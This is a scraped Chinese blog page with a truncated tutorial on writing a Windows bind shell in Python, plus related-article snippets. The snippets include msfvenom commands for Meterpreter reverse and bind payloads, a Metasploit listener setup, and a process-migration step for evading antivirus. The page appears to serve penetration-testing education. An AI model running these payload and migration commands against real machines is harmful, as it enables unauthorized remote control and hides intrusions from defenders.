windows下的正向shell

最新推荐文章于 2025-03-26 16:33:37 发布

原创

最新推荐文章于 2025-03-26 16:33:37 发布 · 1.2k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#windows #正向shell

本文介绍了在Windows环境中如何创建和使用正向Shell。正向Shell常用于渗透测试，当客户端攻击已知IP的服务器时。文中详细阐述了服务器端和客户端的代码实现，并展示了运行效果。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

学习渗透怎么能不会shell呢，今天和明天的学习内容就是正向shell和反弹shell啦~~
shell：在计算机科学中，Shell俗称壳（用来区别于核），是指“为使用者提供操作界面”的软件（命令解析器）。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令，然后调用相应的应用程序。(ps:这个是百度百科的解释啦~~~)
当客户端攻击服务器端时，此时服务器端IP地址已知，所以可以使用正向shell
在这里分别写服务器端代码和客户端代码；注：每次运行时要先开服务器端
服务器端(被攻击，导入模块：import os；import socket)
基本步骤：
1、创建套接字

s=socket.socket()

2、进行绑定(ip:允许连接的ip，服务器端端口)

s.bind(("0.0.0.0",6666))

3、允许连入的主机数

s.listen()

4、创建接口与连入的主机地址

con,addr=s.accept()

具体代码：

#正向shell 服务器端（win7）被攻击的才导入os模块 每次先开的应为服务器端

import socket
import os

s=socket.socket()
#允许连入的ip，和自己的端口
s.bind(("0.0.

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ST小姐姐

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

正向shell和反弹shell

weixin_45936149的博客

03-26

1万+

正向shell反弹shell的利用场景以及使用技巧

kali使用nc正向反弹windows shell

09-12

1894

3.kali主机运行终端并输入 nc 192.168.31.201 8888 回车后,将反弹windows系统shell到Kali终端。2.查看windows系统IP并运行ncat监听8888端口。现在可通过这个shell对windows系统进行任何操作。1.下载 ncat.exe 并上传到windows。

参与评论您还未登录，请先登录后发表或查看评论

【内网安全】域横向内网漫游Socks代理隧道技术

_Co1a

09-21

3053

代理技术和隧道技术都属于内网穿透，代理主要解决内网里面通信的问题（比如对方在内网，你也在内网，这时候两个内网实现通信就必须要经过代理才能实现，常见工具有frp、ngrok和ew等，ew（earthworm已经停止更新了，就不演示）），和一些防火墙的拦截隧道主要是一些安全设备和流量监控设备上的拦截问题代理主要解决的是三种问题：内网主机有外网，内网有过滤有一些防火墙问题、内网里面无外网必要基础知识点： 1.内外网简单知识内网ip地址是私有ip地址（10/8, 172.16/1...

shell的正向和反向

qq_46258964的博客

02-05

9176

正向shell和反向shell 正向shell：控制端主动发起连接去连接被控制端反向shell：被控制端主动连接控制端在实战中，大多数采用反向shell，因为正向shell有很多因素导致连接失败，比如说硬件设备有防火墙，入侵防御系统等，还有网站防火墙，端口占用，权限不足等场景，特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇，后期攻击相当繁琐。反向shell：而被控制端主动向外发送的数据包通常都不会被拦截。反向shell如下 Linux常见反向shell bash反弹shell nc -lvp

[基础入门]正向shell和反弹shell

恰柠的博客

08-22

1880

其实这个过程是相对的，需要找到一个参考点，假如说现在目标机器是Windows，攻击机器是Linux，Linux去连接Windows这个过程就是正向的，相反，如果Windows主动连接Linux那就是反向的，也叫做反弹。RCE(remote command/code execute) 远程系统命令执行，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。

linux正向连接shell_Linux Shellcode 绑定端口（正向连接和反向连接)

weixin_28693309的博客

12-24

350

该楼层疑似违规已被系统折叠隐藏此楼查看此楼804809a: b0 66 mov $0x66,%al804809c: cd 80 int $0x80804809e: 89 c3 mo...

提防远程攻击：了解正向 Shell 和反向 Shell 确保服务器安全

06-28

1350

在当今网络安全形势日益复杂的环境中，了解正向 Shell 和反向 Shell 的工作原理和使用场景，对于保护你的服务器免受远程攻击至关重要。本文不仅深入解析这两种常见的远程控制技术，还将提供有效的防护建议，帮助你提升服务器的安全防护水平，确保你的系统免遭入侵。在计算机网络和信息安全领域，正向 Shell 和反向 Shell 是两种常见的远程控制技术。它们在渗透测试、漏洞利用以及系统管理等方面有着广泛应用。正向 Shell (Forward Shell) 是指攻击者直接连接到目标机器的 Shell。

msfconsole之制作windows木马并成功获取shell（正向payload)

2201_75387456的博客

05-27

1355

还有⽐如有⼀种情况，⽬标处于深层⽹络，不能直接连通外⽹，也不能通过其他机器连通，因为其他机器防⽕墙都开着，为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现，也只能⽤正向的⻢，然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议。端⼝启⽤监听后，只会接收⼀次数据，⽆论成功或者失败，它都不会再监听了！将生成的文件在靶机中打开，利用netstat -ano查看打开的端口。

让所有正向程序实现反向连接

weixin_33728708的博客

11-16

622

现在的服务器几乎全是放在硬件防火墙后的，好不容易渗透进去，结果却发现装有硬件防火墙，扫兴啊！什么终端服务、什么Radmin之类的控方式想都不要想。试了试，发现几乎都支持反向连接，正向连接只能连接80和21端口，连1433都连不上。那就传个反向的后门上去吧，一传上去就被杀毒软件Kill了。一气之下，搬出Delphi，自己动手写后门！花了几天的时间，后门终于...

java实现正向Shell（附带源码）

欢迎来到我的博客！这里是一个专注于计算机技术的分享平台，涵盖编程开发、算法研究、系统架构、软件工程等多个领域。无论你是初学者还是资深开发者，都能在这里找到有价值的内容。

03-07

937

java实现正向Shell（附带源码）

linux正向连接shell_使用netcat的正向 / 反向shell

weixin_39947306的博客

12-24

1138

reverse shellbind shellreverse shell描述图：在此示例中，目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意，我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令，并使用Netcat发出命令启动反向shell。先启动...

正反向连接获得SHELL

kakaxia6337的专栏

08-22

773

#include #include #pragma comment(lib,"ws2_32.lib") SOCKET locals; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in s_sin; void help(char *cmd) { printf("CmdShell v1.0 ---- Made by Zwell/n"); printf("/tUsage:%s [host] port

永恒之蓝漏洞利用：正向Shell与反向Shell的攻防解析

weixin_47114294的博客

03-26

394

永恒之蓝（EternalBlue）作为史上最具破坏力的SMB协议漏洞之一，其利用方式中“正向Shell”与“反向Shell”是渗透测试的核心技术。本文将通过实操演示，解析这两种Shell的工作原理、适用场景及防御策略，帮助安全从业者深入理解漏洞利用的本质，并提升企业内网防护能力。

正反代理与正反shell

weixin_45585955的博客

04-10

629

反向代理是从目标机器主动连接攻击者电脑，例如通过在目标机器执行操作访问者电脑建立的Shell。正向代理是从攻击者电脑主动访问目标机器，例如主动访问目标建立shell是正向shell。反向shell是指攻击者出于外网，被攻击者出于内网，且是被攻击者主动连接攻击者；内外网的区别，正向shell是攻击者出于内网，被攻击者出于公网；正向shell：控制端主动发起连接去连接被控制端。正向代理是服务器开放端口，客户端主动访问服务器的端口。反向shell：被控制端主动连接控制端。一、正向代理与反向代理。

认识正向代理、反向代理、正向 Shell 和反弹 Shell

lwwzyy

11-16

1329

终于懂了！正向代理、反向代理、正向 Shell 和反弹 Shell

Windows正向绑定shell和反向反弹shell的Python代码

weixin_30569001的博客

10-12

466

Windows下的shell原理经过查阅资料，使用os.dup2(nfd, ofd)的方式重定向socket的输入输出到windows系统的cmd是无法做到的，属于系统原因，不能直接复制Linux下的方案，所以只能写程序收集socket的输入，调用subprocess.Popen去执行，然后获取输出后在返回给socket。 Python源代码 # -*- coding:utf-8 -*- ...

如何进行正反向shell连接

大家好

12-21

372

正反向shell连接

内网渗透（二）——连接shell、NC网络数据传输

qq_61562251的博客

12-10

1866

一、连接shellwebshell的定义：web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中，大多数采用反向shell，因为正向shell有很多因素导致连接失败，比如：硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等，一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具：nc（netcat）nc，也称为netcat，是一款功能强大的网络工具，可以在网络上进行数据传输。

linux正向连接shell_Linux一句话反向shell原理

weixin_32467423的博客

12-24

2168

一、什么是反向shell就是控制端监听在某TCP/UDP端口，被控制端主动连接控制端的这一端口，控制端可以通过这一端口进行相关命令操作。像telnet，ssh这些可以理解为正向shell，控制端主动连通控制端，而反向shell则是正向shell的向。反向shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形，同时也实现了被控端的精准控制(指定了被控制端的IP，除此之外的是无法和被控端无法...

Payload模块木马生成，反向shell和正向shell

最新发布

07-04

### Payload模块木马生成方法在渗透测试中，Payload模块是Metasploit框架中的核心组件之一，用于生成特定攻击载荷，以便在目标系统上执行代码。使用`msfvenom`工具可以方便地生成各种类型的Payload，包括反向Shell（Reverse Shell）和正向Shell（Bind Shell）。以Windows平台为例，生成一个反向Shell的Payload可以通过以下命令： ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > shell.exe ``` 上述命令中： - `-p` 指定使用的Payload类型为 `windows/meterpreter/reverse_tcp`； - `LHOST` 是攻击者的IP地址； - `LPORT` 是攻击者监听的端口号； - `-f` 指定输出格式为 `.exe` 文件； - 最后将生成的文件保存为 `shell.exe` [^2]。对于正向Shell的生成，假设目标机器仅允许特定端口出站，则可以使用如下命令： ```bash msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.5.130 LPORT=4444 -f exe > bind_shell.exe ``` 其中： - `RHOST` 是目标主机的IP地址； - `LPORT` 是目标主机上监听的端口号 [^3]。 ### 反向Shell原理与实现反向Shell是指目标主机主动连接回攻击者的主机，这种方式通常更难以被防火墙或入侵检测系统（IDS）发现，因为它看起来像是正常的出站流量。反向Shell的工作机制是通过在目标系统上运行恶意代码，该代码会尝试连接到攻击者的服务器，一旦连接成功，攻击者就可以通过这个连接发送命令并在目标系统上执行。例如，在Metasploit中设置监听器来接收反向Shell的连接： ```bash use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.5.129 set LPORT 7680 run ``` 这段配置告诉Metasploit使用`reverse_tcp`类型的Payload，并指定本地主机地址和监听端口，然后启动监听服务等待目标系统的连接 [^2]。 ### 正向Shell原理与实现正向Shell则是由攻击者主动发起连接至目标主机上的某个开放端口，从而获得命令行访问权限。这种方式适用于那些不允许出站连接或者有严格出站规则的目标环境。然而，由于这种连接是从外部发起的，更容易被防火墙或安全设备拦截。为了实现正向Shell，需要在目标系统上运行一个绑定到本地端口的服务，等待攻击者连接。例如，使用Metasploit生成一个绑定到4444端口的正向Shell： ```bash use exploit/multi/handler set PAYLOAD windows/meterpreter/bind_tcp set RHOST 192.168.5.130 set LPORT 4444 run ``` 这里的关键在于`bind_tcp`类型的Payload会在目标主机上监听指定端口，等待攻击者连接 [^3]。 ### 进程迁移技术当通过反向Shell获取了目标系统的控制权之后，为了防止被轻易发现，攻击者可能会采取进程迁移（Process Migration）的技术手段。这意味着将当前的Meterpreter会话从原始进程中迁移到另一个合法存在的进程中，如`explorer.exe`或`OneDrive.exe`等，以此来规避杀毒软件或终端防护工具的检测。具体操作如下： ```bash ps getpid migrate -N OneDrive.exe ``` 这些命令首先列出所有可用进程，获取当前Meterpreter会话所在的进程ID，接着将当前会话迁移到`OneDrive.exe`进程中 [^2]。 ---